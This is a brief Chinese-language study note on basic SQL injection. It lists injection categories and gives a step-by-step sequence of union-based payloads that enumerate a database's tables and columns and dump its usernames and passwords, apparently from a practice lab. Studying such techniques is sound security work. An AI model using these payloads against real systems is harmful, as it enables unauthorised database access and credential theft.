最基本的SQL注入

分类：

整型

字符型

 

联合查询

报错注入

布尔型盲注

时间型盲注

 

二次注入

堆叠注入

宽字节注入

 

注入流程：

测试注入点

判断闭合

测数列 order by 

判断显示位 union select 1,2,3,4

查库名 union select 1,2,database() -- +

查表名 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- +

查字段 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- +

查数据 union select 1,2,group_concat(username,0x23,password) from security.users --+

 

其他：

group_concat():逗号分隔输出